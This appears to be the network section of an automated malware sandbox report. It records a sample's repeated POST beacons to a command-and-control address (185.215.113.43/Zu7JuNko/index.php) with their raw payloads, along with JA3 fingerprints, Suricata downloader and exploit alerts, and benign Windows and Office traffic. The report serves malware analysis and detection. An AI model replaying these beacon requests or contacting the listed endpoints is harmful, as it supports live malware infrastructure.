Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 20.189.173.8 20.189.173.8

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49946 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49990 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49999 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50001 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50002 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50003 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50005 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50006 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50007 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50009 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50011 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50012 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50015 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50013 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50016 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50019 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50018 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:50017 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50020 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50021 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50022 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50023 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50027 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50026 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50032 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50033 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50041 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50073 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50063 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50092 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50129 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:50110 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50132 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50161 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:50170 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50172 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50174 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50213 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50216 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50220 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50313 -> 13.69.116.108:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50312 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50314 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50316 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50319 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50308 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50320 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50323 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50325 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50324 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50328 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50329 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50331 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50332 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50335 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50337 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50376 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50385 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50382 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50377 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50389 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50309 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50380 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50374 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50383 -> 104.21.5.155:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49758
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49948

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:50070 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.74
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008CE0C0 recv,recv,recv,recv,

0_2_008CE0C0

Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=5x1TTNvoAxBWSo2&MD=oay1reMr HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
